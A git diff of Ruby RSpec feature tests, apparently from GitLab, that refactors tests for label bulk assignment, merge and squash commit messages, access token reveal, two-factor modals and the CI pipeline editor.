expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'frontend' + expect(find(issue_2_selector)).to have_content 'bug' + expect(find(issue_2_selector)).not_to have_content 'frontend' end end @@ -75,10 +78,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'frontend' - expect(find("#issue_#{issue2.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue2.id}")).not_to have_content 'frontend' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'frontend' + expect(find(issue_2_selector)).not_to have_content 'bug' + expect(find(issue_2_selector)).not_to have_content 'frontend' end end @@ -90,10 +93,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'frontend' - expect(find("#issue_#{issue2.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue2.id}")).not_to have_content 'frontend' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'frontend' + expect(find(issue_2_selector)).not_to have_content 'bug' + expect(find(issue_2_selector)).not_to have_content 'frontend' end end end @@ -107,10 +110,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).to have_content 'bug' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'feature' + expect(find(issue_2_selector)).to have_content 'bug' + expect(find(issue_2_selector)).to have_content 'feature' end end @@ -122,10 +125,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue2.id}")).not_to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'feature' + expect(find(issue_2_selector)).not_to have_content 'bug' + expect(find(issue_2_selector)).not_to have_content 'feature' end end end @@ -144,8 +147,8 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue2.id}")).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_2_selector)).to have_content 'bug' end end @@ -164,10 +167,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue1.id}")).not_to have_content 'feature' - expect(find("#issue_#{issue2.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue2.id}")).not_to have_content 'feature' + expect(find(issue_1_selector)).not_to have_content 'bug' + expect(find(issue_1_selector)).not_to have_content 'feature' + expect(find(issue_2_selector)).not_to have_content 'bug' + expect(find(issue_2_selector)).not_to have_content 'feature' end end @@ -183,8 +186,8 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' + expect(find(issue_1_selector)).not_to have_content 'bug' + expect(find(issue_2_selector)).to have_content 'feature' end end @@ -203,10 +206,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' + expect(find(issue_1_selector)).not_to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'feature' + expect(find(issue_2_selector)).not_to have_content 'bug' + expect(find(issue_2_selector)).to have_content 'feature' end end end @@ -222,18 +225,18 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it 'keeps labels' do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_2_selector)).to have_content 'feature' check 'Select all' open_milestone_dropdown(['First Release']) update_issues - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'First Release' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).to have_content 'First Release' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'First Release' + expect(find(issue_2_selector)).to have_content 'feature' + expect(find(issue_2_selector)).to have_content 'First Release' end end @@ -244,18 +247,18 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it 'keeps existing label and new label is present' do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'bug' check 'Select all' open_milestone_dropdown ['First Release'] open_labels_dropdown ['feature'] update_issues - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'feature' - expect(find("#issue_#{issue1.id}")).to have_content 'First Release' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).to have_content 'First Release' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'First Release' + expect(find(issue_2_selector)).to have_content 'feature' + expect(find(issue_2_selector)).to have_content 'First Release' end end @@ -269,9 +272,9 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it 'keeps existing label and new label is present' do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_2_selector)).to have_content 'feature' check 'Select all' @@ -279,11 +282,11 @@ RSpec.describe 'Issues > Labels bulk assignment' do unmark_labels_in_dropdown ['feature'] update_issues - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).not_to have_content 'feature' - expect(find("#issue_#{issue1.id}")).to have_content 'First Release' - expect(find("#issue_#{issue2.id}")).not_to have_content 'feature' - expect(find("#issue_#{issue2.id}")).to have_content 'First Release' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).not_to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'First Release' + expect(find(issue_2_selector)).not_to have_content 'feature' + expect(find(issue_2_selector)).to have_content 'First Release' end end @@ -300,19 +303,19 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it 'keeps labels' do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'First Release' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).to have_content 'First Release' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'First Release' + expect(find(issue_2_selector)).to have_content 'feature' + expect(find(issue_2_selector)).to have_content 'First Release' check 'Select all' open_milestone_dropdown(['No milestone']) update_issues - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).not_to have_content 'First Release' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).not_to have_content 'First Release' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).not_to have_content 'First Release' + expect(find(issue_2_selector)).to have_content 'feature' + expect(find(issue_2_selector)).not_to have_content 'First Release' end end end @@ -324,7 +327,7 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'bug' check_issue issue1 open_labels_dropdown ['feature'] @@ -333,8 +336,8 @@ RSpec.describe 'Issues > Labels bulk assignment' do update_issues sleep 1 # needed - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'feature' end end @@ -350,7 +353,7 @@ RSpec.describe 'Issues > Labels bulk assignment' do update_issues - expect(find("#issue_#{issue1.id}")).to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'feature' end end @@ -381,12 +384,12 @@ RSpec.describe 'Issues > Labels bulk assignment' do update_issues - first_issue = find("#issue_#{issue1.id}") + first_issue = find(issue_1_selector) expect(first_issue).not_to have_content 'bug' expect(first_issue).to have_content 'feature' expect(first_issue).to have_content 'wontfix' - second_issue = find("#issue_#{issue2.id}") + second_issue = find(issue_2_selector) expect(second_issue).not_to have_content 'bug' expect(second_issue).not_to have_content 'feature' expect(second_issue).to have_content 'wontfix' diff --git a/spec/features/issues/user_edits_issue_spec.rb b/spec/features/issues/user_edits_issue_spec.rb index 76cec2502e3..a036a9a5bbc 100644 --- a/spec/features/issues/user_edits_issue_spec.rb +++ b/spec/features/issues/user_edits_issue_spec.rb @@ -15,7 +15,6 @@ RSpec.describe "Issues > User edits issue", :js do context 'with authorized user' do before do - stub_feature_flags(labels_widget: false) project.add_developer(user) project_with_milestones.add_developer(user) sign_in(user) @@ -146,12 +145,12 @@ RSpec.describe "Issues > User edits issue", :js do fill_in 'Comment', with: '/label ~syzygy' click_button 'Comment' - expect(page).to have_text('added syzygy label just now') + expect(page).to have_text('added syzygy label just now', wait: 300) page.within '.block.labels' do # Remove `verisimilitude` label within '.gl-label' do - click_button + click_button 'Remove label' end expect(page).to have_text('syzygy') @@ -418,7 +417,7 @@ RSpec.describe "Issues > User edits issue", :js do it 'adds due date to issue' do date = Date.today.at_beginning_of_month + 2.days - page.within '[data-testid="due-date"]' do + page.within '[data-testid="sidebar-due-date"]' do click_button 'Edit' page.within '.pika-single' do click_button date.day @@ -433,7 +432,7 @@ RSpec.describe "Issues > User edits issue", :js do it 'removes due date from issue' do date = Date.today.at_beginning_of_month + 2.days - page.within '[data-testid="due-date"]' do + page.within '[data-testid="sidebar-due-date"]' do click_button 'Edit' page.within '.pika-single' do diff --git a/spec/features/issues/user_invites_from_a_comment_spec.rb b/spec/features/issues/user_invites_from_a_comment_spec.rb deleted file mode 100644 index 82061f6ed79..00000000000 --- a/spec/features/issues/user_invites_from_a_comment_spec.rb +++ /dev/null @@ -1,25 +0,0 @@ -# frozen_string_literal: true - -require "spec_helper" - -RSpec.describe "User invites from a comment", :js do - let_it_be(:project) { create(:project_empty_repo, :public) } - let_it_be(:issue) { create(:issue, project: project) } - let_it_be(:user) { project.owner } - - before do - sign_in(user) - end - - it "launches the invite modal from invite link on a comment" do - stub_experiments(invite_members_in_comment: :invite_member_link) - - visit project_issue_path(project, issue) - - page.within(".new-note") do - click_button 'Invite Member' - end - - expect(page).to have_content("You're inviting members to the") - end -end diff --git a/spec/features/labels_hierarchy_spec.rb b/spec/features/labels_hierarchy_spec.rb index 25c315f2d16..6c8d41fd96f 100644 --- a/spec/features/labels_hierarchy_spec.rb +++ b/spec/features/labels_hierarchy_spec.rb @@ -17,7 +17,6 @@ RSpec.describe 'Labels Hierarchy', :js do let!(:project_label_1) { create(:label, project: project_1, title: 'Label_4') } before do - stub_feature_flags(labels_widget: false) grandparent.add_owner(user) sign_in(user) @@ -28,13 +27,12 @@ RSpec.describe 'Labels Hierarchy', :js do [grandparent_group_label, parent_group_label, project_label_1].each do |label| page.within('.block.labels') do click_on 'Edit' - end - wait_for_requests + wait_for_requests - find('a.label-item', text: label.title).click - wait_for_requests - click_on 'Close' + click_on label.title + click_on 'Close' + end wait_for_requests @@ -66,7 +64,7 @@ RSpec.describe 'Labels Hierarchy', :js do end else expect_issues_list_count(1) - expect(page).to have_selector('span.issue-title-text', text: labeled_issue.title) + expect(page).to have_selector('.issue-title', text: labeled_issue.title) end end end @@ -76,7 +74,7 @@ RSpec.describe 'Labels Hierarchy', :js do wait_for_requests - expect(page).not_to have_selector('.btn-link', text: child_group_label.title) + expect(page).not_to have_link child_group_label.title end end @@ -109,9 +107,9 @@ RSpec.describe 'Labels Hierarchy', :js do end else expect_issues_list_count(3) - expect(page).to have_selector('span.issue-title-text', text: labeled_issue.title) - expect(page).to have_selector('span.issue-title-text', text: labeled_issue_2.title) - expect(page).to have_selector('span.issue-title-text', text: labeled_issue_3.title) + expect(page).to have_selector('.issue-title', text: labeled_issue.title) + expect(page).to have_selector('.issue-title', text: labeled_issue_2.title) + expect(page).to have_selector('.issue-title', text: labeled_issue_3.title) end end end @@ -131,7 +129,7 @@ RSpec.describe 'Labels Hierarchy', :js do end else expect_issues_list_count(1) - expect(page).to have_selector('span.issue-title-text', text: labeled_issue_3.title) + expect(page).to have_selector('.issue-title', text: labeled_issue_3.title) end end @@ -233,7 +231,7 @@ RSpec.describe 'Labels Hierarchy', :js do wait_for_requests - expect(page).not_to have_selector('.btn-link', text: child_group_label.title) + expect(page).not_to have_link child_group_label.title end end diff --git a/spec/features/merge_request/user_customizes_merge_commit_message_spec.rb b/spec/features/merge_request/user_customizes_merge_commit_message_spec.rb index 06795344c5c..67a232607cd 100644 --- a/spec/features/merge_request/user_customizes_merge_commit_message_spec.rb +++ b/spec/features/merge_request/user_customizes_merge_commit_message_spec.rb @@ -7,19 +7,26 @@ RSpec.describe 'Merge request < User customizes merge commit message', :js do let(:user) { project.creator } let(:issue_1) { create(:issue, project: project)} let(:issue_2) { create(:issue, project: project)} + let(:source_branch) { 'csv' } + let(:target_branch) { 'master' } + let(:squash) { false } let(:merge_request) do create( :merge_request, - :simple, source_project: project, - description: "Description\n\nclosing #{issue_1.to_reference}, #{issue_2.to_reference}" + target_project: project, + source_branch: source_branch, + target_branch: target_branch, + description: "Description\n\nclosing #{issue_1.to_reference}, #{issue_2.to_reference}", + squash: squash ) end - let(:textbox) { page.find(:css, '#merge-message-edit', visible: false) } - let(:default_message) do + let(:merge_textbox) { page.find(:css, '#merge-message-edit', visible: false) } + let(:squash_textbox) { page.find(:css, '#squash-message-edit', visible: false) } + let(:default_merge_commit_message) do [ - "Merge branch 'feature' into 'master'", + "Merge branch '#{source_branch}' into '#{target_branch}'", merge_request.title, "Closes #{issue_1.to_reference} and #{issue_2.to_reference}", "See merge request #{merge_request.to_reference(full: true)}" @@ -35,8 +42,8 @@ RSpec.describe 'Merge request < User customizes merge commit message', :js do it 'has commit message without description' do expect(page).not_to have_selector('#merge-message-edit') first('.js-mr-widget-commits-count').click - expect(textbox).to be_visible - expect(textbox.value).to eq(default_message) + expect(merge_textbox).to be_visible + expect(merge_textbox.value).to eq(default_merge_commit_message) end context 'when target project has merge commit template set' do @@ -45,8 +52,34 @@ RSpec.describe 'Merge request < User customizes merge commit message', :js do it 'uses merge commit template' do expect(page).not_to have_selector('#merge-message-edit') first('.js-mr-widget-commits-count').click - expect(textbox).to be_visible - expect(textbox.value).to eq(merge_request.title) + expect(merge_textbox).to be_visible + expect(merge_textbox.value).to eq(merge_request.title) + end + end + + context 'when squash is performed' do + let(:squash) { true } + + it 'has default message with merge request title' do + expect(page).not_to have_selector('#squash-message-edit') + first('.js-mr-widget-commits-count').click + expect(squash_textbox).to be_visible + expect(merge_textbox).to be_visible + expect(squash_textbox.value).to eq(merge_request.title) + expect(merge_textbox.value).to eq(default_merge_commit_message) + end + + context 'when target project has squash commit template set' do + let(:project) { create(:project, :public, :repository, squash_commit_template: '%{description}') } + + it 'uses squash commit template' do + expect(page).not_to have_selector('#squash-message-edit') + first('.js-mr-widget-commits-count').click + expect(squash_textbox).to be_visible + expect(merge_textbox).to be_visible + expect(squash_textbox.value).to eq(merge_request.description) + expect(merge_textbox.value).to eq(default_merge_commit_message) + end end end end diff --git a/spec/features/merge_request/user_expands_diff_spec.rb b/spec/features/merge_request/user_expands_diff_spec.rb index 09c5897f102..52554f11d28 100644 --- a/spec/features/merge_request/user_expands_diff_spec.rb +++ b/spec/features/merge_request/user_expands_diff_spec.rb @@ -7,7 +7,6 @@ RSpec.describe 'User expands diff', :js do let(:merge_request) { create(:merge_request, source_branch: 'expand-collapse-files', source_project: project, target_project: project) } before do - stub_feature_flags(increased_diff_limits: false) allow(Gitlab::CurrentSettings).to receive(:diff_max_patch_bytes).and_return(100.kilobytes) visit(diffs_project_merge_request_path(project, merge_request)) diff --git a/spec/features/merge_request/user_invites_from_a_comment_spec.rb b/spec/features/merge_request/user_invites_from_a_comment_spec.rb deleted file mode 100644 index 79865094fd0..00000000000 --- a/spec/features/merge_request/user_invites_from_a_comment_spec.rb +++ /dev/null @@ -1,25 +0,0 @@ -# frozen_string_literal: true - -require "spec_helper" - -RSpec.describe "User invites from a comment", :js do - let_it_be(:project) { create(:project, :public, :repository) } - let_it_be(:merge_request) { create(:merge_request, source_project: project) } - let_it_be(:user) { project.owner } - - before do - sign_in(user) - end - - it "launches the invite modal from invite link on a comment" do - stub_experiments(invite_members_in_comment: :invite_member_link) - - visit project_merge_request_path(project, merge_request) - - page.within(".new-note") do - click_button 'Invite Member' - end - - expect(page).to have_content("You're inviting members to the") - end -end diff --git a/spec/features/merge_request/user_posts_diff_notes_spec.rb b/spec/features/merge_request/user_posts_diff_notes_spec.rb index 79e46e69157..9e314e18563 100644 --- a/spec/features/merge_request/user_posts_diff_notes_spec.rb +++ b/spec/features/merge_request/user_posts_diff_notes_spec.rb @@ -4,6 +4,7 @@ require 'spec_helper' RSpec.describe 'Merge request > User posts diff notes', :js do include MergeRequestDiffHelpers + include Spec::Support::Helpers::ModalHelpers let(:merge_request) { create(:merge_request) } let(:project) { merge_request.source_project } @@ -238,10 +239,8 @@ RSpec.describe 'Merge request > User posts diff notes', :js do def should_allow_dismissing_a_comment(line_holder, diff_side = nil) write_comment_on_line(line_holder, diff_side) - find('.js-close-discussion-note-form').click - - page.within('.modal') do - click_button 'OK' + accept_gl_confirm(s_('Notes|Are you sure you want to cancel creating this comment?')) do + find('.js-close-discussion-note-form').click end assert_comment_dismissal(line_holder) diff --git a/spec/features/merge_request/user_resolves_wip_mr_spec.rb b/spec/features/merge_request/user_resolves_wip_mr_spec.rb index 93b14279a06..fd405855cf8 100644 --- a/spec/features/merge_request/user_resolves_wip_mr_spec.rb +++ b/spec/features/merge_request/user_resolves_wip_mr_spec.rb @@ -33,7 +33,7 @@ RSpec.describe 'Merge request > User resolves Work in Progress', :js do it 'retains merge request data after clicking Resolve WIP status' do expect(page.find('.ci-widget-content')).to have_content("Pipeline ##{pipeline.id}") - expect(page).to have_content "This merge request is still a draft." + expect(page).to have_content "Merge blocked: merge request must be marked as ready. It's still marked as draft." page.within('.mr-state-widget') do click_button('Mark as ready') @@ -45,7 +45,7 @@ RSpec.describe 'Merge request > User resolves Work in Progress', :js do # merge request widget refreshes, which masks missing elements # that should already be present. expect(page.find('.ci-widget-content', wait: 0)).to have_content("Pipeline ##{pipeline.id}") - expect(page).not_to have_content('This merge request is still a draft.') + expect(page).not_to have_content("Merge blocked: merge request must be marked as ready. It's still marked as draft.") end end end diff --git a/spec/features/merge_request/user_sees_wip_help_message_spec.rb b/spec/features/merge_request/user_sees_wip_help_message_spec.rb index 0a6a3d82ee0..d33e54f2e3d 100644 --- a/spec/features/merge_request/user_sees_wip_help_message_spec.rb +++ b/spec/features/merge_request/user_sees_wip_help_message_spec.rb @@ -46,8 +46,8 @@ RSpec.describe 'Merge request > User sees draft help message' do 'It looks like you have some draft commits in this branch' ) expect(page).to have_text( - "Start the title with Draft: to prevent a merge request that is a \ -work in progress from being merged before it's ready." + "Start the title with Draft: to prevent a merge request draft \ +from merging before it's ready." ) end end diff --git a/spec/features/merge_request/user_squashes_merge_request_spec.rb b/spec/features/merge_request/user_squashes_merge_request_spec.rb index 15f59c0d7bc..2a48657ac4f 100644 --- a/spec/features/merge_request/user_squashes_merge_request_spec.rb +++ b/spec/features/merge_request/user_squashes_merge_request_spec.rb @@ -22,7 +22,7 @@ RSpec.describe 'User squashes a merge request', :js do committer_name: user.name) merge_commit = an_object_having_attributes(sha: a_string_matching(/\h{40}/), - message: a_string_starting_with("Merge branch 'csv' into 'master'"), + message: a_string_starting_with("Merge branch '#{source_branch}' into 'master'"), author_name: user.name, committer_name: user.name) @@ -57,34 +57,34 @@ RSpec.describe 'User squashes a merge request', :js do end context 'when the MR has only one commit' do - let(:source_branch) { 'master' } - let(:target_branch) { 'branch-merged' } - let(:protected_source_branch) { true } + let(:source_branch) { 'feature' } + let(:target_branch) { 'master' } let(:source_sha) { project.commit(source_branch).sha } let(:target_sha) { project.commit(target_branch).sha } before do - merge_request = create(:merge_request, source_project: project, target_project: project, source_branch: source_branch, target_branch: target_branch, squash: true) - - visit project_merge_request_path(project, merge_request) + visit project_new_merge_request_path(project, merge_request: { target_branch: target_branch, source_branch: source_branch }) + check 'merge_request[squash]' + click_on 'Create merge request' + wait_for_requests end - it 'accepts the merge request without issuing a squash request', :sidekiq_inline do - expect_next_instance_of(Gitlab::GitalyClient::OperationService) do |instance| - expect(instance).not_to receive(:user_squash) + context 'when squash message differs from existing commit message' do + before do + accept_mr end - expect(project.repository.ancestor?(source_branch, target_branch)).to be_falsey - expect(page).not_to have_field('squash') - - accept_mr - - expect(page).to have_content('Merged') + include_examples 'squash' + end - latest_target_commits = project.repository.commits_between(source_sha, target_sha).map(&:raw) + context 'when squash message is the same as existing commit message' do + before do + click_button("Modify commit messages") + fill_in('Squash commit message', with: project.commit(source_branch).safe_message) + accept_mr + end - expect(latest_target_commits.count).to eq(1) - expect(project.repository.ancestor?(source_branch, target_branch)).to be_truthy + include_examples 'no squash' end end diff --git a/spec/features/merge_request/user_views_open_merge_request_spec.rb b/spec/features/merge_request/user_views_open_merge_request_spec.rb index 073706cf9d8..b5a973a53c0 100644 --- a/spec/features/merge_request/user_views_open_merge_request_spec.rb +++ b/spec/features/merge_request/user_views_open_merge_request_spec.rb @@ -20,7 +20,7 @@ RSpec.describe 'User views an open merge request' do # Work around a weird Capybara behavior where calling `parent` on a node # returns the whole document, not the node's actual parent element - expect(find(:xpath, "#{node.path}/..").text).to eq(merge_request.description[2..-1]) + expect(find(:xpath, "#{node.path}/..").text).to eq(merge_request.description[2..]) expect(page).to have_content(merge_request.title) end diff --git a/spec/features/one_trust_spec.rb b/spec/features/one_trust_spec.rb new file mode 100644 index 00000000000..0ed08e8b99b --- /dev/null +++ b/spec/features/one_trust_spec.rb @@ -0,0 +1,23 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'OneTrust' do + context 'almost there page' do + context 'when OneTrust is enabled' do + let_it_be(:onetrust_url) { 'https://*.onetrust.com' } + let_it_be(:one_trust_id) { SecureRandom.uuid } + + before do + stub_config(extra: { one_trust_id: one_trust_id }) + stub_feature_flags(ecomm_instrumentation: true) + visit users_almost_there_path + end + + it 'has the OneTrust CSP settings', :aggregate_failures do + expect(response_headers['Content-Security-Policy']).to include("#{onetrust_url}") + expect(page.html).to include("https://cdn.cookielaw.org/consent/#{one_trust_id}/OtAutoBlock.js") + end + end + end +end diff --git a/spec/features/profile_spec.rb b/spec/features/profile_spec.rb index 7d935298f38..24ba55994ae 100644 --- a/spec/features/profile_spec.rb +++ b/spec/features/profile_spec.rb @@ -63,11 +63,24 @@ RSpec.describe 'Profile account page', :js do end describe 'when I reset feed token' do - before do + it 'resets feed token with `hide_access_tokens` feature flag enabled' do visit profile_personal_access_tokens_path + + within('[data-testid="feed-token-container"]') do + previous_token = find_field('Feed token').value + + accept_confirm { click_link('reset this token') } + + click_button('Click to reveal') + + expect(find_field('Feed token').value).not_to eq(previous_token) + end end - it 'resets feed token' do + it 'resets feed token with `hide_access_tokens` feature flag disabled' do + stub_feature_flags(hide_access_tokens: false) + visit profile_personal_access_tokens_path + within('.feed-token-reset') do previous_token = find("#feed_token").value @@ -82,10 +95,26 @@ RSpec.describe 'Profile account page', :js do before do allow(Gitlab.config.incoming_email).to receive(:enabled).and_return(true) stub_feature_flags(bootstrap_confirmation_modals: false) + end + + it 'resets incoming email token with `hide_access_tokens` feature flag enabled' do visit profile_personal_access_tokens_path + + within('[data-testid="incoming-email-token-container"]') do + previous_token = find_field('Incoming email token').value + + accept_confirm { click_link('reset this token') } + + click_button('Click to reveal') + + expect(find_field('Incoming email token').value).not_to eq(previous_token) + end end - it 'resets incoming email token' do + it 'resets incoming email token with `hide_access_tokens` feature flag disabled' do + stub_feature_flags(hide_access_tokens: false) + visit profile_personal_access_tokens_path + within('.incoming-email-token-reset') do previous_token = find('#incoming_email_token').value diff --git a/spec/features/profiles/personal_access_tokens_spec.rb b/spec/features/profiles/personal_access_tokens_spec.rb index 74505633cae..135a940807e 100644 --- a/spec/features/profiles/personal_access_tokens_spec.rb +++ b/spec/features/profiles/personal_access_tokens_spec.rb @@ -18,10 +18,6 @@ RSpec.describe 'Profile > Personal Access Tokens', :js do find("#created-personal-access-token").value end - def feed_token - find("#feed_token").value - end - def feed_token_description "Your feed token authenticates you when your RSS reader loads a personalized RSS feed or when your calendar application loads a personalized calendar. It is visible in those feed URLs." end @@ -136,12 +132,24 @@ RSpec.describe 'Profile > Personal Access Tokens', :js do describe "feed token" do context "when enabled" do - it "displays feed token" do + it "displays feed token with `hide_access_tokens` feature flag enabled" do allow(Gitlab::CurrentSettings).to receive(:disable_feed_token).and_return(false) visit profile_personal_access_tokens_path - expect(feed_token).to eq(user.feed_token) + within('[data-testid="feed-token-container"]') do + click_button('Click to reveal') + + expect(page).to have_field('Feed token', with: user.feed_token) + expect(page).to have_content(feed_token_description) + end + end + + it "displays feed token with `hide_access_tokens` feature flag disabled" do + stub_feature_flags(hide_access_tokens: false) + allow(Gitlab::CurrentSettings).to receive(:disable_feed_token).and_return(false) + visit profile_personal_access_tokens_path + expect(page).to have_field('Feed token', with: user.feed_token) expect(page).to have_content(feed_token_description) end end @@ -151,8 +159,8 @@ RSpec.describe 'Profile > Personal Access Tokens', :js do allow(Gitlab::CurrentSettings).to receive(:disable_feed_token).and_return(true) visit profile_personal_access_tokens_path - expect(page).to have_no_content(feed_token_description) - expect(page).to have_no_css("#feed_token") + expect(page).not_to have_content(feed_token_description) + expect(page).not_to have_field('Feed token') end end end diff --git a/spec/features/profiles/two_factor_auths_spec.rb b/spec/features/profiles/two_factor_auths_spec.rb index a9256a73d7b..9a58950b8f3 100644 --- a/spec/features/profiles/two_factor_auths_spec.rb +++ b/spec/features/profiles/two_factor_auths_spec.rb @@ -3,6 +3,8 @@ require 'spec_helper' RSpec.describe 'Two factor auths' do + include Spec::Support::Helpers::ModalHelpers + context 'when signed in' do before do sign_in(user) @@ -70,7 +72,7 @@ RSpec.describe 'Two factor auths' do click_button 'Disable two-factor authentication' - page.within('[role="dialog"]') do + within_modal do click_button 'Disable' end @@ -80,7 +82,7 @@ RSpec.describe 'Two factor auths' do click_button 'Disable two-factor authentication' - page.within('[role="dialog"]') do + within_modal do click_button 'Disable' end @@ -112,7 +114,7 @@ RSpec.describe 'Two factor auths' do click_button 'Disable two-factor authentication' - page.within('[role="dialog"]') do + within_modal do click_button 'Disable' end diff --git a/spec/features/profiles/user_visits_profile_spec.rb b/spec/features/profiles/user_visits_profile_spec.rb index 273d52996d3..d90ac439eee 100644 --- a/spec/features/profiles/user_visits_profile_spec.rb +++ b/spec/features/profiles/user_visits_profile_spec.rb @@ -29,6 +29,24 @@ RSpec.describe 'User visits their profile' do expect(find('.file-content')).to have_content('testme') end + it 'hides empty user readme' do + project = create(:project, :repository, :public, path: user.username, namespace: user.namespace) + + Files::UpdateService.new( + project, + user, + start_branch: 'master', + branch_name: 'master', + commit_message: 'Update feature', + file_path: 'README.md', + file_content: '' + ).execute + + visit(user_path(user)) + + expect(page).not_to have_selector('.file-content') + end + context 'when user has groups' do let(:group) do create :group do |group| diff --git a/spec/features/projects/ci/editor_spec.rb b/spec/features/projects/ci/editor_spec.rb index 7fe1c63f490..16cfa9f5f84 100644 --- a/spec/features/projects/ci/editor_spec.rb +++ b/spec/features/projects/ci/editor_spec.rb @@ -51,5 +51,65 @@ RSpec.describe 'Pipeline Editor', :js do expect(page).not_to have_content(default_branch) end end + + it 'displays new branch as selected after commiting on a new branch' do + find('#target-branch-field').set('new_branch', clear: :backspace) + + click_button 'Commit changes' + + page.within('[data-testid="branch-selector"]') do + expect(page).to have_content('new_branch') + expect(page).not_to have_content(default_branch) + end + end + end + + context 'Editor content' do + it 'user can reset their CI configuration' do + click_button 'Collapse' + + page.within('#source-editor-') do + find('textarea').send_keys '123' + end + + # It takes some time after sending keys for the reset + # btn to register the changes inside the editor + sleep 1 + click_button 'Reset' + + expect(page).to have_css('#reset-content') + + page.within('#reset-content') do + click_button 'Reset file' + end + + page.within('#source-editor-') do + expect(page).to have_content('Default Content') + expect(page).not_to have_content('Default Content123') + end + end + + it 'user can cancel reseting their CI configuration' do + click_button 'Collapse' + + page.within('#source-editor-') do + find('textarea').send_keys '123' + end + + # It takes some time after sending keys for the reset + # btn to register the changes inside the editor + sleep 1 + click_button 'Reset' + + expect(page).to have_css('#reset-content') + + page.within('#reset-content') do + click_button 'Cancel' + end + + page.within('#source-editor-') do + expect(page).to have_content('Default Content123') + end + end end end diff --git a/spec/features/projects/cluster_agents_spec.rb b/spec/features/projects/cluster_agents_spec.rb index 3ef710169f0..4018ef2abc9 100644 --- a/spec/features/projects/cluster_agents_spec.rb +++ b/spec/features/projects/cluster_agents_spec.rb @@ -22,7 +22,7 @@ RSpec.describe 'ClusterAgents', :js do end it 'displays empty state', :aggregate_failures do - expect(page).to have_content('Install new Agent') + expect(page).to have_content('Install a new agent') expect(page).to have_selector('.empty-state') end end 